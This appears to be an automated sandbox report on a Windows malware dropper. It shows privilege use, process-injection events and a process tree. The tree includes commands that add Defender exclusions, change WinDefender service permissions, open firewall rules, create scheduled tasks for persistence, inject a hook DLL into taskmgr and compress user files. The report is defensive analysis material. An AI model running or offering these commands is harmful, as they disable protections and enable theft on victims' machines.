description pid Process Token: SeDebugPrivilege 2980 osminog.exe Token: SeDebugPrivilege 3184 goldprime1234.exe Token: SeDebugPrivilege 4352 powershell.exe Token: SeIncreaseQuotaPrivilege 4504 WMIC.exe Token: SeSecurityPrivilege 4504 WMIC.exe Token: SeTakeOwnershipPrivilege 4504 WMIC.exe Token: SeLoadDriverPrivilege 4504 WMIC.exe Token: SeSystemProfilePrivilege 4504 WMIC.exe Token: SeSystemtimePrivilege 4504 WMIC.exe Token: SeProfSingleProcessPrivilege 4504 WMIC.exe Token: SeIncBasePriorityPrivilege 4504 WMIC.exe Token: SeCreatePagefilePrivilege 4504 WMIC.exe Token: SeBackupPrivilege 4504 WMIC.exe Token: SeRestorePrivilege 4504 WMIC.exe Token: SeShutdownPrivilege 4504 WMIC.exe Token: SeDebugPrivilege 4504 WMIC.exe Token: SeSystemEnvironmentPrivilege 4504 WMIC.exe Token: SeRemoteShutdownPrivilege 4504 WMIC.exe Token: SeUndockPrivilege 4504 WMIC.exe Token: SeManageVolumePrivilege 4504 WMIC.exe Token: 33 4504 WMIC.exe Token: 34 4504 WMIC.exe Token: 35 4504 WMIC.exe Token: 36 4504 WMIC.exe Token: SeIncreaseQuotaPrivilege 4504 WMIC.exe Token: SeSecurityPrivilege 4504 WMIC.exe Token: SeTakeOwnershipPrivilege 4504 WMIC.exe Token: SeLoadDriverPrivilege 4504 WMIC.exe Token: SeSystemProfilePrivilege 4504 WMIC.exe Token: SeSystemtimePrivilege 4504 WMIC.exe Token: SeProfSingleProcessPrivilege 4504 WMIC.exe Token: SeIncBasePriorityPrivilege 4504 WMIC.exe Token: SeCreatePagefilePrivilege 4504 WMIC.exe Token: SeBackupPrivilege 4504 WMIC.exe Token: SeRestorePrivilege 4504 WMIC.exe Token: SeShutdownPrivilege 4504 WMIC.exe Token: SeDebugPrivilege 4504 WMIC.exe Token: SeSystemEnvironmentPrivilege 4504 WMIC.exe Token: SeRemoteShutdownPrivilege 4504 WMIC.exe Token: SeUndockPrivilege 4504 WMIC.exe Token: SeManageVolumePrivilege 4504 WMIC.exe Token: 33 4504 WMIC.exe Token: 34 4504 WMIC.exe Token: 35 4504 WMIC.exe Token: 36 4504 WMIC.exe Token: SeDebugPrivilege 1228 tasklist.exe Token: SeIncreaseQuotaPrivilege 4516 WMIC.exe Token: SeSecurityPrivilege 4516 WMIC.exe Token: SeTakeOwnershipPrivilege 4516 WMIC.exe Token: SeLoadDriverPrivilege 4516 WMIC.exe Token: SeSystemProfilePrivilege 4516 WMIC.exe Token: SeSystemtimePrivilege 4516 WMIC.exe Token: SeProfSingleProcessPrivilege 4516 WMIC.exe Token: SeIncBasePriorityPrivilege 4516 WMIC.exe Token: SeCreatePagefilePrivilege 4516 WMIC.exe Token: SeBackupPrivilege 4516 WMIC.exe Token: SeRestorePrivilege 4516 WMIC.exe Token: SeShutdownPrivilege 4516 WMIC.exe Token: SeDebugPrivilege 4516 WMIC.exe Token: SeSystemEnvironmentPrivilege 4516 WMIC.exe Token: SeRemoteShutdownPrivilege 4516 WMIC.exe Token: SeUndockPrivilege 4516 WMIC.exe Token: SeManageVolumePrivilege 4516 WMIC.exe Token: 33 4516 WMIC.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 1904 cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 5040 amadka.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5428 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2140 wrote to memory of 2980 2140 explorgu.exe 102 PID 2140 wrote to memory of 2980 2140 explorgu.exe 102 PID 2140 wrote to memory of 2980 2140 explorgu.exe 102 PID 2140 wrote to memory of 3184 2140 explorgu.exe 104 PID 2140 wrote to memory of 3184 2140 explorgu.exe 104 PID 2140 wrote to memory of 3184 2140 explorgu.exe 104 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 2980 wrote to memory of 3896 2980 osminog.exe 107 PID 3184 wrote to memory of 3608 3184 goldprime1234.exe 106 PID 3184 wrote to memory of 3608 3184 goldprime1234.exe 106 PID 3184 wrote to memory of 3608 3184 goldprime1234.exe 106 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 3184 wrote to memory of 2052 3184 goldprime1234.exe 108 PID 2140 wrote to memory of 956 2140 explorgu.exe 112 PID 2140 wrote to memory of 956 2140 explorgu.exe 112 PID 2140 wrote to memory of 956 2140 explorgu.exe 112 PID 956 wrote to memory of 3204 956 rundll32.exe 113 PID 956 wrote to memory of 3204 956 rundll32.exe 113 PID 2140 wrote to memory of 3884 2140 explorgu.exe 114 PID 2140 wrote to memory of 3884 2140 explorgu.exe 114 PID 3204 wrote to memory of 2824 3204 rundll32.exe 115 PID 3204 wrote to memory of 2824 3204 rundll32.exe 115 PID 2140 wrote to memory of 1544 2140 explorgu.exe 118 PID 2140 wrote to memory of 1544 2140 explorgu.exe 118 PID 2140 wrote to memory of 1544 2140 explorgu.exe 118 PID 3884 wrote to memory of 4184 3884 judith1234.exe 117 PID 3884 wrote to memory of 4184 3884 judith1234.exe 117 PID 4184 wrote to memory of 4360 4184 stub.exe 120 PID 4184 wrote to memory of 4360 4184 stub.exe 120 PID 3204 wrote to memory of 4352 3204 rundll32.exe 121 PID 3204 wrote to memory of 4352 3204 rundll32.exe 121 PID 4184 wrote to memory of 1696 4184 stub.exe 124 PID 4184 wrote to memory of 1696 4184 stub.exe 124 PID 4184 wrote to memory of 2664 4184 stub.exe 125 PID 4184 wrote to memory of 2664 4184 stub.exe 125 PID 4184 wrote to memory of 980 4184 stub.exe 127 PID 4184 wrote to memory of 980 4184 stub.exe 127 PID 4184 wrote to memory of 3472 4184 stub.exe 129 PID 4184 wrote to memory of 3472 4184 stub.exe 129 PID 1696 wrote to memory of 4504 1696 cmd.exe 132 PID 1696 wrote to memory of 4504 1696 cmd.exe 132 PID 2664 wrote to memory of 4516 2664 cmd.exe 133 PID 2664 wrote to memory of 4516 2664 cmd.exe 133 PID 3472 wrote to memory of 1228 3472 cmd.exe 134 PID 3472 wrote to memory of 1228 3472 cmd.exe 134 PID 4184 wrote to memory of 1508 4184 stub.exe 135 PID 4184 wrote to memory of 1508 4184 stub.exe 135 PID 2140 wrote to memory of 3656 2140 explorgu.exe 137 PID 2140 wrote to memory of 3656 2140 explorgu.exe 137 PID 1508 wrote to memory of 4092 1508 cmd.exe 154 PID 1508 wrote to memory of 4092 1508 cmd.exe 154
Processes
-
C:\Users\Admin\AppData\Local\Temp\cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe"C:\Users\Admin\AppData\Local\Temp\cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1904
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe"C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 12204⤵
- Program crash
PID:2084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000837001\goldprime1234.exe"C:\Users\Admin\AppData\Local\Temp\1000837001\goldprime1234.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2052
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\570491262506_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000838001\judith1234.exe"C:\Users\Admin\AppData\Local\Temp\1000838001\judith1234.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\onefile_3884_133549495347338545\stub.exe"C:\Users\Admin\AppData\Local\Temp\1000838001\judith1234.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:4360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"4⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"4⤵PID:980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"4⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer5⤵PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1140
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:4936
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:576
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000858001\alex12341.exe"C:\Users\Admin\AppData\Local\Temp\1000858001\alex12341.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1088
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
PID:2228 -
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5080
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\TWO.exe"C:\Users\Admin\AppData\Roaming\configurationValue\TWO.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4488
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:2440
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:5220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000865001\TeamFour.exe"C:\Users\Admin\AppData\Local\Temp\1000865001\TeamFour.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:4492
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000874021\random.cmd" "2⤵PID:2704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4092 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe66e346f8,0x7ffe66e34708,0x7ffe66e347184⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:24⤵PID:5384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3124 /prefetch:84⤵PID:5604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:14⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:14⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9924626398517477735,8477720371824093245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:14⤵PID:5904
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/3⤵PID:1540
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe66e346f8,0x7ffe66e34708,0x7ffe66e347184⤵PID:4724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,13905267584296726021,6880956590632673158,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:24⤵PID:5788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,13905267584296726021,6880956590632673158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5876
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video3⤵PID:5548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe66e346f8,0x7ffe66e34708,0x7ffe66e347184⤵PID:5696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000875001\amadka.exe"C:\Users\Admin\AppData\Local\Temp\1000875001\amadka.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5980 -
C:\Users\Admin\AppData\Local\Temp\1000010001\lenin.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lenin.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:2760
-
-
C:\Users\Admin\AppData\Local\Temp\1000021001\InstallSetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000021001\InstallSetup8.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2016 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN InstallSetup8.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000021001\InstallSetup8.exe" /F5⤵
- Creates scheduled task(s)
PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\1000151001\InstallSetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000151001\InstallSetup8.exe"5⤵
- Executes dropped EXE
PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\1000152001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\4767d2e713f2021e8fe856e3ea638b58.exe"5⤵
- Executes dropped EXE
PID:2396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\1000152001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\4767d2e713f2021e8fe856e3ea638b58.exe"6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Modifies data under HKEY_USERS
PID:6012
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2616
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:4296
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:864
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵PID:4908
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:4632
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5780
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:5452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5536
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:316
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:2988
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:812
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:1268
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:5496
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000153001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\FirstZ.exe"5⤵
- Executes dropped EXE
PID:5516 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵PID:5464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5320
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:1960
-
-
-
